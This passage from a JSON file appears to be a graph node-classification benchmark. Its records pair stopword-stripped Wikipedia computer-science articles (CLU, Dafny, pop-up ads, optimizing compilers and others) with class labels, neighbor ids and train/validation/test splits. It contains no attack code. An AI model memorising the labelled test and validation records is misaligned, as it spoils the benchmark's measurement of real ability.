    "text": "Network_Centric_Product_Support:network centric product support network centric product support ncps early application internet things iot computer architecture developed leverage new information technologies global networks assist managing maintenance support supply chain complex products made one complex systems mobile aircraft fleet fixed location assets building systems accomplished establishing digital threads connecting physical deployed subsystem design digital twins virtual model embedding intelligence networked micro-web servers also function computer workstation within subsystem component i.e engine control unit aircraft controller enabling 2-way communications using existing internet technologies communications networks thus allowing extension product lifecycle management plm system mobile deployed product subsystem level real time ncps considered support flip side network-centric warfare approach goes beyond traditional logistics aftermarket support functions taking complex adaptive system management approach integrating field maintenance logistics unified factory field environment evolution began insights gained cdr dave loda usnr network centric warfare-based fleet battle experimentation us naval warfare development command nwdc late 1990s later lead commercial research efforts ncps aviation united technologies corporation interaction mit auto-id labs epcglobal air transport association america ata spec 100/ispec 2200 consortium pioneering emerging machine machine internet things iot architecture contributed evolution ncps simply put architecture extends existing world wide web infrastructure networked web servers product subsystem controller level using systems engineering system systems nested approach core embedded dual function webserver/computer workstation connected product controller test ports used retrofit applications integrated directly controller new products hence providing access operational cycles sensor information clustered internet addressable node allows local remote access ability host remotely reconfigurable software collect process data mated subsystem controller onboard pull computing resources throughout network establish localized wireless world wide web around product securely connected mechanic web browser-equipped handheld independent greater world wide web well seamlessly integrate global networks external wireless communications available thus creating data digital twins factory connecting deployed product usage product lifecycle constantly updated digital threads allows integrated approach enables offline online updates occur legacy systems usually require human physically connect laptop system controller telematic solution manually collect data carry back location later transferred factory restricted webserver-based download sites offboard analysis architecture also enables communications micro-webservers computer cluster i.e aircraft higher level clusters internet portal managed fleet flight operations managers thus enabling access data resources personnel factory engineers remote office computers world wide web stated previously system operates asynchronously always connected world wide web function rather simply operates locally synchronizes two-way information relevant subsystem acting gateway telecommunications board connects gateways within network airborne ground as-needed basis communications available accomplished wireless lan network satellite cellular network wireless wired communications capabilities security network critical architecture utilize standard web security protocols public-key cryptography embedded hardware encryption devices extension world wide web architecture product important understand decisions manufacturing spare parts scheduling flights factory oem airline operator functions driven primarily happens product field rate wear impending failure primarily predicting rate wear hence impact operations forecasting producing spare parts future critical optimizing operations involved managing complex system fleet aircraft vehicles fixed location products accomplished manner example coupled technologies rfid system could track parts factory aircraft board continue read configuration subsystem ’ replaceable tagged parts map configuration hours run duty cycles process/communicate projected wear rate world wide web back operator factory way mechanical wear rates future failures predicted accurately forecasting spare parts manufacturing shipment significantly improved called prognostics health monitoring phm become possible recent years advent electronic controllers recent evolutionary step aircraft support maintenance management began individual processes prior world war ii solidified manual tracking system support aircraft fleets korean war support mechanic comes local wireless access technical information stored remotely updated board micro-webserver component relevant product service bulletins factory updates fault code driven intelligent 3d computer game-like maintenance procedures social media applications sharing product issues maintenance procedure improvements field include collaborative 2-way voice text image communications note architecture utilized system requires monitoring trending include mobile medical applications monitoring functionality human systems subject equipped data sensors original micro-webserver component i. e. onboard unit key enabling ncps architecture first prototyped demonstrated 2001 david loda enzo macchia sam quadri bjorn stickling united technologies pratt whitney division initially tested board fairchild-dornier 328 later avcraft 328 regional jet january 2002 introduced public demonstrated farnborough air show july 2002 prototype form 2004 flight certified product offering marketed united technologies dtu later fast data management units service number aircraft helicopter fleets similar complex systems approach completely different application successfully embodied eisenhower interstate highway system though transported ncps information cars trucks network centric product support net-centric product support architectural concept merely connects major avenues already existing global communications internet mobile product extending maintenance supply chain processes integrated product centric system real time feedback loop designers factory maintainers product performance reliability example gain information particular engine mobile aircraft efficient send inquiry engine directly host information generated relevant system well synchronize twin remote database access queuing engine system communications examples applied include shipping containers automobiles spacecraft appliances human medical monitoring complex product sensors subsystems require maintenance support monitoring many organizations beginning see value netcentric also spelled net-centric approach managing complex systems including network centric operations industry consortium ncoic association leading aerospace defense contractors network centric warfare arena network centric thinking aircraft operations including network enabled operations neo demonstrations also figure prominently commercial next generation air transportation system nextgen approach made us government revamping air transportation management 21st century",
    "neighbors": [
      225,
      8674
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2607,
    "label": 7,
    "text": "Global_Information_Grid-Bandwidth_Expansion:global information grid-bandwidth expansion global information grid bandwidth expansion gig-be program major united states department defense dod net-centric transformational initiative executed disa part global information grid project gig-be created ubiquitous bandwidth-available environment improve national security intelligence surveillance reconnaissance information assurance well command control gig-be disa leveraged dod existing end-to-end information transport capabilities significantly expanding capacity reliability select joint staff-approved locations worldwide gig-be achieved full operational capability foc december 20 2005 program provided increased bandwidth diverse physical access approximately 87 critical sites continental united states conus us pacific command pacom us european command eucom locations interconnected via expanded gig core gig-be provides secure robust optical terrestrial network delivers high-speed classified unclassified internet protocol ip services key operating locations worldwide assistant secretary defense networks information integration asd/nii vision color every base physically diverse network access optical mesh upgrades backbone network regional/man upgrades needed color every base implies every site oc-192 10 gigabits per second usable ip dedicated site extensive component integration operational testing implementation began middle 2004 fiscal year extended calendar year 2005 initial implementation concentrated six sites used proof initial operational capability ioc achieved september 30 2004 gig-be program office conducted detailed site surveys approximately 87 joint staff-approved locations parallel implementation conus overseas gig-be program office completed final operational test evaluation fot e 54 operational sites october 7 2005 december 20 2005 gig-be program achieved milestone full operational capability gig-be awarded saic 2001 877 million contract development instantiation maintenance gig-be network saic instantly divided equipment tasks subcontracts subcontracts follows representatives marty meehan d-mass jim saxton r-nj expressed concern selection process contractor lead gig-be effort say handled irresponsibly reason expressed meehan spokesperson kimberly abbott whole bidding process n't fair open could contractor government led decision process saic contract eventually handed large subset engineering light meehan stress questioning competence winners two congressman delivered letter dod regarding contract issue slowly forgotten",
    "neighbors": [
      5472,
      7979,
      6834,
      6267,
      7388
    ],
    "mask": "Train"
  },
  {
    "node_id": 2608,
    "label": 9,
    "text": "Uwe_Schöning:uwe schöning uwe schöning born 28 december 1955 german computer scientist known research computational complexity theory schöning earned ph.d. university stuttgart 1981 supervision wolfram schwabhäuser professor institute theoretical informatics university ulm schöning introduced low high hierarchies structural complexity theory 1983 schöning later showed 1988 paper hierarchies play important role complexity graph isomorphism problem schöning developed 1993 monograph köbler toran 1999 focs paper schöning showed walksat randomized algorithm previously analyzed 2-satisfiability papadimitriou good expected time complexity although still exponential applied worst-case instances 3-satisfiability np-complete constraint satisfaction problems time fastest guaranteed time bound 3sat subsequent research built idea develop even faster algorithms schöning also inventor pedagogical programming languages loop goto described textbook theoretische informatik kurz gefasst schöning author editor many books computer science including research articles include",
    "neighbors": [
      8262,
      1783
    ],
    "mask": "Test"
  },
  {
    "node_id": 2609,
    "label": 4,
    "text": "Zooko_Wilcox-O'Hearn:zooko wilcox-o'hearn zooko wilcox-o'hearn born bryce wilcox may 13 1974 phoenix arizona american colorado-based computer security specialist cypherpunk ceo zcash known tahoe least-authority file store tahoe-lafs secure decentralized fault-tolerant filesystem released gpl tgppl licenses creator transitive grace period public licence tgppl wilcox-o'hearn designer multiple network protocols incorporate concepts self-contained economies secure reputation systems member development team zrtp blake2 cryptographic hash function zooko triangle named wilcox-o'hearn described schema relates three desirable properties identifiers 2001 founder ceo least authority enterprises boulder colorado developer mojonation p2p system lead developer follow-on mnet network developer simplegeo furthermore zooko part founding team launched zcash 2016",
    "neighbors": [
      8640,
      3713,
      728,
      4380,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 2610,
    "label": 4,
    "text": "Georgia_SoftWorks:georgia softworks georgia softworks gsw privately held software development company headquartered dawsonville georgia united states company creates data communications systems telecommunications applications commercial emphasis ssh/telnet server microsoft windows georgia softworks markets reliability product suite features designed industrial applications company claims supplied first ssh server using digital certificate authentication internet information server-like certificate user account mapping established 1991 georgia softworks started custom software development company specializing data communications telecommunications applications company needed reliable telnet connectivity windows nt features correctly displayed characters proper function key operation alt-key operation time telnet widely available unix frequently utilized windows commercial environments georgia softworks developed gsw telnet server windows named foundation product universal terminal server designed different protocols could installed requirements determined gsw added features telnet server mouse operation file transfer telnet connection successful in-house use uts commercialized georgia softworks developed major features uts logon scripts feature eventually evolved global per user per ip address certificate based logon scripts features included client device failure detection graceful termination session saver automatic logon session monitoring shadowing team services technology georgia softworks developed commercialized fips 140-2 compliant ssh2 server client software designed run top uts product platform georgia softworks resellers end users every continent except antarctica across variety industries including government automobile manufactures schools oil companies airlines pharmaceutical medical food beverage nasa many",
    "neighbors": [
      420,
      10341,
      11112,
      6797,
      8976,
      5492,
      9780
    ],
    "mask": "None"
  },
  {
    "node_id": 2611,
    "label": 4,
    "text": "Pop-up_ad:pop-up ad pop-up ads pop-ups forms online advertising world wide web pop-up graphical user interface gui display area usually small window suddenly appears pops foreground visual interface pop-up window containing advertisement usually generated javascript uses cross-site scripting xss sometimes secondary payload uses adobe flash also generated vulnerabilities/security holes browser security variation pop-up window pop-under advertisement opens new browser window active window pop-unders interrupt user immediately appear user closes covering window making difficult determine website created pop-up ads originated tripod.com webpage hosting site late 1990s javascript provided capability web page open another window ethan zuckerman claims used capability launch advertisements separate windows response complaints advertisers ads appearing pages sexual content zuckerman later apologized unforeseen nuisance pop-up ads evolved web development design technologies allow author associate item pop-up action including cancel innocent looking button bad experiences apprehensive possible damage may cause users click interact item inside pop-up window whatsoever may leave site generated block pop-ups opera first major browser incorporate tools block pop-up ads mozilla browser later improved blocking pop-ups generated page loads early 2000s major web browsers except internet explorer let users block unwanted pop-ups almost completely 2004 microsoft released windows xp sp2 added pop-up blocking internet explorer modern browsers provide pop-up blocking tools third-party tools add features ad filtering users websites web applications continuously experience unwanted pop ads course normal interaction web browser ordinarily users respond dismissing pop-up close cancel feature window hosting pop-up typical response authors pop-up advertising depend create on-screen buttons controls look similar close cancel option user chooses one simulated cancel options however button performs unexpected unauthorized action opening new pop-up downloading unwanted file user system hover ad in-page pop-up uses dhtml combine banner ad pop-up window appears front browser screen javascript imposes advertisement webpage transparent layer advertisement appear variety forms example advertisement contain adobe flash animation links advertiser site advertisement also look like regular window pop-up blockers block ad part webpage blocked third-party ad blockers adblock adblock plus using custom style sheets urls sometimes redirected advertisement pages url redirection urls sometimes opened new tab content old background tab replaced advertisement page url redirection times switches tab user advertisement tab adblock plus ublock noscript block redirects pop-under ads similar pop-up ads ad window appears hidden behind main browser window rather superimposed front pop-up ads became widespread intrusive often taking whole computer screen many users would immediately close pop-up ads appeared site without looking pop-under ads immediately impede view content remain unnoticed user closes minimizes main browser window pop-under ad involves two javascript functions introduced 1997 netscape 2.0b3 browser modern web publishers advertisers use create window front users screen load advertisement send behind screen modern browsers allow codice_1 execute called user interaction e.g. mouse click event handler non-interactive calls timer callback load events etc codice_1 result new window blocked bypass restriction pop-under ads trigger mouse click event listener attached directly document document body enables catching mouse click events consumed click event handlers calling codice_1 without blocked example user selects text mouse click triggers mouse click handler attached document pop-under opens using code notice techniques bypass codice_1 call restriction hijacking mouse clicks exitexchange.com filed patent 2000 subset pop-under advertising called exit pop years controversy numerous articles pop-under patent patent awarded united states patent trademark office uspto april june 2008 respective patent numbers patent 7,386,555 related method opening exit pop toolbar software application computing device whereas patent 7,353,229 covers method used open exit pop embedded script found within media file e.g. javascript code web page copyright aspects pop-up advertising discussed wikipedia articles derivative works transformativeness articles contain illustrations links examples pop-up advertising",
    "neighbors": [
      5636,
      3462,
      7304,
      8584,
      6028,
      24,
      4889,
      10392,
      6045,
      5536,
      5281,
      2213,
      1970,
      9908,
      7098,
      3643,
      2108,
      444,
      704,
      10057,
      11469,
      7515,
      8923,
      1629,
      735,
      4198,
      877,
      4718,
      6513,
      119
    ],
    "mask": "Test"
  },
  {
    "node_id": 2612,
    "label": 7,
    "text": "GeoMesa:geomesa geomesa open-source distributed spatio-temporal index built top bigtable-style databases using implementation geohash algorithm written scala geomesa capable ingesting indexing querying billions geometry features using highly parallelized index scheme geomesa builds top open source geo osg libraries implements geotools datastore interface providing standardized access feature collections well implementing geoserver plugin google announced geomesa supported google cloud bigtable hosted nosql service release blog post may 2015 geomesa also supports bigtable-derivative implementations apache accumulo apache hbase geomesa implements z-order curve via custom geohash implementation combine three dimensions geometry time i.e latitude/longitude/timestamp single-dimension lexicographic key space provided accumulo",
    "neighbors": [
      7816,
      7983,
      6131,
      823,
      3705
    ],
    "mask": "Test"
  },
  {
    "node_id": 2613,
    "label": 7,
    "text": "Ragic:ragic ragic online database management system marketed platform service model online database creation application interface similar spreadsheet additional functionality includes cloud capabilities linking database sheets collaboration generating reports query builder allows users find information integration file storage services like dropbox productivity tools like evernote ragic enables business users familiar spreadsheets build database apps without programming developers make use http api server-side javascript perform complex operations",
    "neighbors": [
      3462,
      4623
    ],
    "mask": "None"
  },
  {
    "node_id": 2614,
    "label": 2,
    "text": "MacvsWindows:macvswindows mac vs windows formerly xvsxp online operating system comparison wiki run james scariati michael moriarty site longer active domains point spam blogs site compares competing operating systems windows vista mac os x v10.5 100 different topics site explicitly includes out-of-the-box experience os well freely released updates manufacturer unique feature site many os comparison sites features forum encourage readers voice concerns comments site well suggestions additions site originally launched march 2003 dan pouliot scope site explicit also concerns creative professional site originally intended advocate os x virtue fair comparison windows xp pouliot acknowledged fair comparison difficult relied debates within site online forum refine expand site pdf version site available pouliot reports downloaded 250,000 times launch site time pdf removed january 2005 site almost closed january 2005 including brief period xvsxp converted pay site pouliot time decided needed move change ownership negotiated november 2005 site officially changed hands current owners james scariati michael moriarty rewrite site began renewed objective unbiased comparison point view changed away first person content considered editorial nature removed site officially relaunched march 2006 sporting refreshed look updated sections well format reportedly designed ease updating due upcoming releases operating systems windows vista mac os x v10.5 june 20 2007 xvsxp.com owners announced moving new website mac vs. windows www.macvswindows.com one main new features introduced new website transition wiki model owners stated even current comparison large amount work truly objective comparison aspects platform would require team full-time employees addition current 1 10 scoring system viewed definitive subjective review also compounded final score page option weigh scores based user concerns e.g security given much weight icons criticism xvsxp lodged continued delays providing coverage windows side comparison june 10 2007 site still fails show data windows vista seven months vista ’ release manufacturing rtm even though one xvsxp admins acknowledged four months ago vista released initial acknowledgement february 8 2007 vista came three months went rtm",
    "neighbors": [
      11184,
      8092,
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 2615,
    "label": 1,
    "text": "Traditional_Knowledge_Digital_Library:traditional knowledge digital library traditional knowledge digital library tkdl indian digital knowledge repository traditional knowledge especially medicinal plants formulations used indian systems medicine set 2001 collaboration council scientific industrial research csir ministry ayush objective library protect ancient traditional knowledge country exploitation biopiracy unethical patents documenting electronically classifying per international patent classification systems apart non-patent database serves foster modern research based traditional knowledge simplifies access vast knowledge remedies practices 2010 transcribed 148 books ayurveda unani siddha yoga public domain 34 million pages information translated five languages — english german french spanish japanese data 80,000 formulations ayurveda 1,000,000 unani 12,000 siddha already put tkdl plus signed agreements leading international patent offices european patent office epo united kingdom trademark patent office ukpto united states patent trademark office protect traditional knowledge biopiracy giving patent examiners international patent offices access tkdl database patent search examination issue biopiracy unethical bioprospecting made headlines government india successfully revoked limited turmeric basmati rice patents granted united states patent trademark office uspto neem patent granted european patent office epo late 1990s soon patent claims came light india ’ vast traditional medicine knowledge existed languages like sanskrit hindi arabic persian urdu tamil making inaccessible examiners international patent offices verify claims experience prompted department ayush government india create task force experts areas traditional medicine systems india i.e. ayurveda unani siddha yoga patent examiners experts scientists technical officers creation traditional knowledge digital library tkdl initiated 2001 tasks included example transcribing sanskrit shlokas describe ayurvedic formulation text using traditional knowledge resource classification tkrc devised purpose easily understandable patent examiner anywhere world reason entire 34 million pages text available english german french spanish japanese database project reached completion 2006 government allowed access library international patent offices including european patent office epo japan uk subject non-disclosure clause allows patent examiners evaluate patent applications stop attempts patent traditional knowledge new inventions agreements signed epo february 2009 united kingdom trademark patent office ukpto january 2010 u.s. patent trademark office uspto summit meeting us president barack obama prime minister manmohan singh also january 2010 patent examiners getting access tkdl database legal cases regarding unethical patent claims taken years vast expenditure case could avoided another project include data relating 1,500 postures yoga began 2008 new reports large number false gurus yoga masters attempted patent ancient knowledge countries example 131 yoga-related patents traced us alone 2007 uproar parliament media government india took issue uspto thereafter team yoga gurus nine schools working government officials 200 scientists council scientific industrial research csir scanned 35 ancient texts including hindu epics mahabharata bhagwad gita patanjali yoga sutras register native pose end 2009 1500 asanas added 2010 union environment minister jairam ramesh stated eight years 34 million pages information collected estimated cost rs 7 crore least 36 cases identified epo 40 cases uspto using tkdl future project people ’ register biodiversity set government document protect traditional knowledge passed oral tradition india ’ national biodiversity act 2002",
    "neighbors": [],
    "mask": "Validation"
  },
  {
    "node_id": 2616,
    "label": 2,
    "text": "Queued_Sequential_Access_Method:queued sequential access method ibm mainframe operating systems queued sequential access method qsam access method read write datasets sequentially qsam available os/360 os/vs2 mvs z/os related operating systems qsam used devices naturally sequential punched card readers punches line printers data devices could also addressed directly magnetic disks qsam offers device independence extent possible api calls used different devices qsam is—as name says—queued specific context meaning buffered deblocking reads blocking writes allows programs read write logical records within physical blocks data opposed less advanced basic sequential access method bsam allows programs access physical blocks data provides support accessing logical records within blocks indeed qsam manages truncated final blocks truncated embedded blocks completely transparently user qsam application program interface compared interface offered open read write close calls using file handles operating systems unix windows",
    "neighbors": [
      11656,
      6797,
      7053,
      7312,
      7836,
      7983,
      10415,
      8393,
      10958,
      8911,
      8272,
      3669,
      10072,
      2395,
      8290,
      868,
      7272,
      4586,
      10094,
      5492,
      6647,
      2168,
      11131
    ],
    "mask": "Test"
  },
  {
    "node_id": 2617,
    "label": 9,
    "text": "CLU_(programming_language):clu programming language clu programming language created massachusetts institute technology mit barbara liskov students 1974 1975 find extensive use introduced many features used widely seen step development object-oriented programming oop key contributions include abstract data types call-by-sharing iterators multiple return values form parallel assignment type-safe parameterized types type-safe variant types also notable use classes constructors methods without inheritance syntax clu based algol starting point new language designs key addition concept cluster clu type extension system root language name cluster clusters correspond generally concept class oo language similar syntax instance clu syntax cluster implements complex numbers cluster module encapsulates components except explicitly named clause correspond public components class recent oo languages cluster also defines type named outside cluster case complex_number representation type rep hidden external clients cluster names global namespace mechanism provided group clusters allow created locally inside clusters clu perform implicit type conversions cluster explicit type conversions change abstract type representation universal type procedure force check object certain type objects may mutable immutable latter base types integers booleans characters strings another key feature clu type system iterators return objects collection serially one another iterators offer identical application programming interface api matter data used thus iterator collection codice_1s used interchangeably array codice_2s distinctive feature clu iterators implemented coroutines value provided caller via yield statement iterators like clu common feature many modern languages c ruby python though recently often referred generators clu also includes exception handling based various attempts languages exceptions raised using codice_3 handled codice_4 unlike languages exception handling exceptions implicitly resignaled calling chain also unlike languages provide exception handling exceptions clu considered part ordinary execution flow considered normal efficient typesafe way break loops return functions allows direct assignment return values except conditions apply exceptions neither caught resignaled explicitly immediately converted special failure exception typically terminates program clu often credited first language type-safe variant types called oneofs language ml final distinctive feature clu parallel assignment multiple assignment one variable appear left hand side assignment operator instance writing codice_5 would exchange values codice_6 codice_7 way functions could return several values like codice_8 parallel assignment though multiple return values predates clu appearing cpl 1963 named simultaneous assignment clu popularized often credited direct influence leading parallel assignment later languages objects clu program live heap memory management automatic clu supports type parameterized user-defined data abstractions first language offer type-safe bounded parameterized types using structure clauses express constraints actual type arguments clu influenced many languages many ways approximate chronological order include clu ada major inspirations c++ templates clu exception handling mechanisms influenced later languages like c++ java sather python c include iterators first appeared clu perl lua took multiple assignment multiple returns function calls clu python ruby borrowed several concepts clu call sharing yield statement multiple assignment",
    "neighbors": [
      512,
      9345,
      3076,
      8582,
      6160,
      9245,
      10145,
      4777,
      428,
      5677,
      10043,
      2556,
      10435,
      70,
      8262,
      10568,
      1610,
      11219,
      11604,
      7894,
      7386,
      6502,
      11625,
      8554,
      1399,
      7292,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 2618,
    "label": 9,
    "text": "Dafny:dafny dafny imperative compiled language targets c supports formal specification preconditions postconditions loop invariants loop variants language combines ideas primarily functional imperative paradigms includes limited support object-oriented programming features include generic classes dynamic allocation inductive datatypes variation separation logic known implicit dynamic frames reasoning side effects dafny created rustan leino microsoft research previous work developing esc/modula-3 esc/java spec dafny used widely teaching features regularly software verification competitions e.g vstte'08 vscomp'10 cost'11 verifythis'12 dafny designed provide simple introduction formal specification verification used widely teaching dafny builds boogie intermediate language uses z3 automated theorem prover discharging proof obligations dafny provides methods implementation may side-effects functions use specification pure methods consist sequences statements following familiar imperative style whilst contrast body function simply expression side-effecting statements method e.g assigning element array parameter must accounted noting parameters mutated codice_1 clause dafny also provides range immutable collection types including sequences e.g codice_2 sets e.g codice_3 maps codice_4 addition mutable arrays e.g codice_5 provided dafny supports proofs imperative programs based ideas hoare logic following illustrates many features dafny including use preconditions postconditions loop invariants loop variants method max arr array int returns max int examples computes maximum element array method precondition postcondition given codice_6 codice_7 clauses respectively likewise loop invariant loop variant given codice_8 codice_9 clauses respectively treatment loop invariants dafny differs traditional hoare logic variables mutated loop treated information known prior loop discarded information required prove properties variables must expressed explicitly loop invariant contrast variables mutated loop retain information known beforehand following provides illustrates method sumandzero ns array int returns sum nat fails verification dafny establish codice_10 holds assignment precondition intuitively codice_11 holds loop since codice_12 nop however assignment causes dafny treat codice_13 mutable variable drop information known loop verify program dafny either remove redundant assignment codice_12 add loop invariant codice_15 dafny additionally employs limited static analysis infer simple loop invariants possible example would seem loop invariant codice_16 also required variable codice_17 mutated within loop whilst underlying logic require invariant dafny automatically infers hence omitted source level dafny includes features support use proof assistant whilst proofs simple properties within codice_18 codice_19 shown unusual tools nature dafny also allows proof properties one codice_18 another common proof assistant proofs often inductive nature dafny perhaps unusual employing method invocation mechanism applying inductive hypothesis following illustrates datatype list nil link data int next list function sum l list int predicate isnatlist l list ghost method natsumlemma l list n int requires isnatlist l n == sum l ensures n 0 codice_21 proves useful property codice_22 codice_23 i.e codice_24 use codice_25 encoding lemma theorems standard dafny recursion employed induction typically structural induction case analysis performed using codice_26 statements non-inductive cases often discharged automatically verifier must also complete access contents codice_18 codice_28 order unroll necessary implications used conjunction access modifiers specifically hiding contents codice_18 using codice_30 modifier limit properties established",
    "neighbors": [
      9345,
      10786,
      4791,
      10571,
      7671,
      3613
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2619,
    "label": 9,
    "text": "Structured_program_theorem:structured program theorem structured program theorem also called böhm–jacopini theorem result programming language theory states class control flow graphs historically called charts context compute computable function combines subprograms three specific ways control structures structured chart subject constraints may however use additional variables form bits stored extra integer variable original proof order keep track information original program represents program location construction based böhm programming language p′′ theorem typically credited 1966 paper corrado böhm giuseppe jacopini david harel wrote 1980 böhm–jacopini paper enjoyed universal popularity particularly proponents structured programming harel also noted due rather technical style 1966 böhm–jacopini paper apparently often cited read detail reviewing large number papers published 1980 harel argued contents böhm–jacopini proof usually misrepresented folk theorem essentially contains simpler result result traced inception modern computing theory papers von neumann kleene harel also writes generic name proposed h.d mills structure theorem early 1970s version theorem replaces original program control flow single global codice_1 loop simulates program counter going possible labels flowchart boxes original non-structured program harel traced origin folk theorem two papers marking beginning computing one 1946 description von neumann architecture explains program counter operates terms loop harel notes single loop used folk version structured programming theorem basically provides operational semantics execution flowchart von neumann computer another even older source harel traced folk version theorem stephen kleene normal form theorem 1936 donald knuth criticized form proof results pseudocode like one pointing structure original program completely lost transformation similarly bruce ian mills wrote approach spirit block structure style language simulating von neumann machine produce behavior spaghetti code within confines block-structured language prevent spaghetti proof böhm jacopini paper proceeds induction structure flow chart employed pattern matching graphs proof böhm jacopini really practical program transformation algorithm thus opened door additional research direction böhm–jacopini proof settle question whether adopt structured programming software development partly construction likely obscure program improve contrary signalled beginning debate edsger dijkstra famous letter go statement considered harmful followed 1968 academics took purist approach böhm–jacopini result argued even instructions like codice_2 codice_3 middle loops bad practice needed böhm–jacopini proof thus advocated loops single exit point purist approach embodied pascal programming language designed 1968–1969 mid-1990s preferred tool teaching introductory programming classes academia edward yourdon notes 1970s even philosophical opposition transforming unstructured programs structured ones automated means based argument one needed think structured programming fashion get go pragmatic counterpoint transformations benefited large body existing programs among first proposals automated transformation 1971 paper edward ashcroft zohar manna direct application böhm–jacopini theorem may result additional local variables introduced structured chart may also result code duplication latter issue called loop half problem context pascal affected problems according empirical studies cited eric s. roberts student programmers difficulty formulating correct solutions pascal several simple problems including writing function searching element array 1980 study henry shapiro cited roberts found using pascal-provided control structures correct solution given 20 subjects subject wrote incorrect code problem allowed write return middle loop 1973 s. rao kosaraju proved possible avoid adding additional variables structured programming long arbitrary-depth multi-level breaks loops allowed furthermore kosaraju proved strict hierarchy programs exists nowadays called kosaraju hierarchy every integer n exists program containing multi-level break depth n rewritten program multi-level breaks depth less n without introducing additional variables kosaraju cites multi-level break construct bliss programming language multi-level breaks form codice_4 keyword actually introduced bliss-11 version language original bliss single-level breaks bliss family languages n't provide unrestricted goto java programming language would later follow approach well simpler result kosaraju paper program reducible structured program without adding variables contain loop two distinct exits reducibility defined kosaraju loosely speaking computing function using primitive actions predicates original program possibly using different control flow structures narrower notion reducibility böhm–jacopini used inspired result section vi highly-cited paper introduced notion cyclomatic complexity thomas j. mccabe described analogue kuratowski theorem control flow graphs cfg non-structured programs say minimal subgraphs make cfg program non-structured subgraphs good description natural language mccabe actually found four graphs independent appearing subgraphs meaning necessary sufficient condition program non-structured cfg subgraph one subset three four graphs also found non-structured program contains one four sub-graphs must contain another distinct one set four latter result helps explain control flow non-structured program becomes entangled popularly called spaghetti code mccabe also devised numerical measure given arbitrary program quantifies far ideal structured program mccabe called measure essential complexity mccabe characterization forbidden graphs structured programming considered incomplete least dijkstra structures considered building blocks 1990 quite proposed methods eliminating gotos existing programs preserving structure various approaches problem also proposed several notions equivalence stricter simply turing equivalence order avoid output like folk theorem discussed strictness chosen notion equivalence dictates minimal set control flow structures needed 1988 jacm paper lyle ramshaw surveys field point well proposing method ramshaw algorithm used example java decompilers java virtual machine code branch instructions targets expressed offsets high-level java language multi-level codice_2 codice_6 statements ammarguellat 1992 proposed transformation method goes back enforcing single-exit 1980s ibm researcher harlan mills oversaw development cobol structuring facility applied structuring algorithm cobol code mills transformation involved following steps procedure note construction improved converting cases selection statement subprocedures material yet covered",
    "neighbors": [
      7940,
      6950,
      3529,
      10953,
      9739,
      8524,
      5677,
      2798,
      3854,
      5872,
      1841,
      5585,
      4980,
      5204,
      10680,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 2620,
    "label": 9,
    "text": "Optimizing_compiler:optimizing compiler computing optimizing compiler compiler tries minimize maximize attributes executable computer program common requirements minimize program execution time memory requirement power consumption last two popular portable computers compiler optimization generally implemented using sequence optimizing transformations algorithms take program transform produce semantically equivalent output program uses fewer resources and/or executes faster shown code optimization problems np-complete even undecidable practice factors programmer willingness wait compiler complete task place upper limits optimizations compiler implementer might provide optimization generally cpu- memory-intensive process past computer memory limitations also major factor limiting optimizations could performed factors optimization rarely produces optimal output sense fact optimization may impede performance cases rather heuristic methods improving resource usage typical programs techniques used optimization broken among various scopes affect anything single statement entire program generally speaking locally scoped techniques easier implement global ones result smaller gains examples scopes include addition scoped optimizations two general categories optimization following instance local machine dependent optimization set register 0 obvious way use constant 0 instruction sets register value constant less obvious way xor register compiler know instruction variant use many risc machines instructions would equally appropriate since would length take time many microprocessors intel x86 family turns xor variant shorter probably faster need decode immediate operand use internal immediate operand register potential problem xor may introduce data dependency previous value register causing pipeline stall however processors often xor register special case cause stalls large extent compiler optimization techniques following themes sometimes conflict optimization techniques primarily designed operate loops include data-flow optimizations based data-flow analysis primarily depend certain properties data propagated control edges control flow graph include optimizations intended done transforming program special form called static single assignment see ssa form every variable assigned one place although function without ssa effective ssa many optimizations listed sections also benefit special changes register allocation although many also apply non-functional languages either originate easily implemented particularly critical functional languages lisp ml interprocedural optimization works entire program across procedure file boundaries works tightly intraprocedural counterparts carried cooperation local part global part typical interprocedural optimizations procedure inlining interprocedural dead code elimination interprocedural constant propagation procedure reordering usual compiler needs perform interprocedural analysis actual optimizations interprocedural analyses include alias analysis array access analysis construction call graph interprocedural optimization common modern commercial compilers sgi intel microsoft sun microsystems long time open source gcc criticized lack powerful interprocedural analysis optimizations though improving another open source compiler full analysis optimization infrastructure open64 due extra time space required interprocedural analysis compilers perform default users must use compiler options explicitly tell compiler enable interprocedural analysis expensive optimizations early history compilers compiler optimizations good hand-written ones compiler technologies improved good compilers typically generate code good enough generally longer warrant much higher effort program hand-optimized code assembly language except special cases risc cpu architectures even vliw hardware compiler optimization key obtaining efficient code risc instruction sets compact hard human manually schedule combine small instructions get efficient results indeed architectures designed rely compiler writers adequate performance however optimizing compilers means perfect way compiler guarantee program source code fastest smallest possible equivalent compiled program output compiler fundamentally impossible would solve halting problem assuming turing completeness may proven considering call function foo function returns nothing side effects i/o modify global variables live data structures etc. fastest possible equivalent program would simply eliminate function call however function foo fact return program call foo would different program without call optimizing compiler determine solving halting problem additionally number practical issues optimizing compiler technology moreover optimization algorithms complicated especially used compile large complex programming languages bugs introduce errors generated code cause internal errors compilation compiler errors kind disconcerting user especially case since may clear optimization logic fault case internal errors problem partially ameliorated fail-safe programming technique optimization logic compiler coded failure trapped warning message issued rest compilation proceeds successful completion work improve optimization technology continues one approach use so-called post-pass optimizers commercial versions date back mainframe software late 1970s tools take executable output optimizing compiler optimize even post pass optimizers usually work assembly language machine code level contrast compilers optimize intermediate representations programs performance post-pass compilers limited fact much information available original source code always available processor performance continues improve rapid pace memory bandwidth improves slowly optimizations reduce memory bandwidth requirements even cost making processor execute relatively instructions become useful examples already mentioned include loop nest optimization rematerialization early compilers 1960s often primarily concerned simply compiling code correctly efficiently – compile times major concern one earliest notable optimizing compilers bliss 1970 described design optimizing compiler 1975 late 1980s optimizing compilers sufficiently effective programming assembly language declined co-evolved development risc chips advanced processor features instruction scheduling speculative execution designed targeted optimizing compilers rather human-written assembly code",
    "neighbors": [
      6664,
      4112,
      2066,
      31,
      5154,
      10786,
      5677,
      5684,
      2620,
      9794,
      8262,
      7245,
      2638,
      7273,
      9331,
      8822,
      7292,
      6815,
      6817,
      6821,
      9911,
      187,
      9432,
      8421,
      10469,
      1776,
      8435,
      3317,
      2808,
      7421,
      7940,
